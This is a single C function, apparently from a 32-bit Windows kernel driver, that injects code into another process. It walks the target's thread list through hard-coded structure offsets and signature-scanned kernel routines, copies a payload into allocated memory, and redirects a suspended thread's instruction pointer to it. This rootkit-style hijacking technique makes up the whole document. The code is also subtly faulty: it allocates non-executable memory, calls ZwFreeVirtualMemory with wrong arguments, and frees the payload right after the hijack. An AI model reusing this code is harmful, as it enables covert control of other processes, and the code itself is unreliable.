NTSTATUS InsertRemoteCode(IN ULONG ProcessId,IN PVOID Function) { PX86_KTRAP_FRAME TrapFramePointer; NTSTATUS NtStatus=STATUS_SUCCESS; PEPROCESS PEProcess=NULL; PETHREAD PEThread=NULL; HANDLE ProcessHandle; HANDLE ThreadHandle; OBJECT_ATTRIBUTES ObjectAttributes; CLIENT_ID ProcessID; CLIENT_ID ThreadID; ULONG ThreadListHead=0; ULONG Flink=0; ULONG Counter=0; UCHAR ThreadState=0; ULONG EThread=0; PVOID FunctionAddress=NULL; SIZE_T RegionSize=0x20; ProcessID.UniqueProcess=(HANDLE)ProcessId; ProcessID.UniqueThread=(HANDLE)0; KeSuspendThread=(FuncType)GetFunctionAddress(0x8b55ff8b,0x0cec83ec,0x758b5653,0x8e8d5708); KeResumeThread=(FuncType)GetFunctionAddress(0x8b55ff8b,0xff5651ec,0x4d871415,0x084d8b80); NtStatus=PsLookupProcessByProcessId((HANDLE)ProcessId, &PEProcess); if (NT_SUCCESS(NtStatus)) { ThreadListHead=(ULONG)PEProcess; ThreadListHead=(ULONG)(ThreadListHead+0x50); Flink=*(ULONG*)ThreadListHead; while (Flink!=ThreadListHead) { Counter++; EThread=(ULONG)Flink-0x1b0; ThreadState=*(UCHAR*)(EThread+0x2d); ThreadID=*(CLIENT_ID*)(EThread+0x1f0); if (ThreadState==1) { PEThread=(PETHREAD)EThread; TrapFramePointer=*(PX86_KTRAP_FRAME*)((ULONG)PEThread+0x134); InitializeObjectAttributes(&ObjectAttributes,NULL,OBJ_KERNEL_HANDLE,NULL,NULL); NtStatus=ZwOpenProcess(&ProcessHandle,(ACCESS_MASK)PROCESS_ALL_ACCESS,&ObjectAttributes,&ProcessID); if (NT_SUCCESS(NtStatus)) { NtStatus=ZwAllocateVirtualMemory (ProcessHandle,&FunctionAddress,0,&RegionSize,MEM_COMMIT,PAGE_READWRITE); if (NT_SUCCESS(NtStatus)) { NtStatus=AttachProcess(ProcessId); if (NT_SUCCESS(NtStatus)) { RtlCopyMemory(FunctionAddress,Function,RegionSize); KeSuspendThread(PEThread); TrapFramePointer->Eip=(ULONG)FunctionAddress; KeResumeThread(PEThread); break; } else { ZwFreeVirtualMemory(ProcessHandle,&FunctionAddress,0,&RegionSize,MEM_COMMIT,PAGE_READWRITE); ZwClose(ProcessHandle); return NtStatus; } } else { ZwClose(ProcessHandle); return NtStatus; } } else { return NtStatus; } } Flink=*(ULONG*)Flink; } } else { return NtStatus; } ZwFreeVirtualMemory(ProcessHandle,&FunctionAddress,0,&RegionSize,MEM_COMMIT,PAGE_READWRITE); ZwClose(ProcessHandle); return NtStatus; }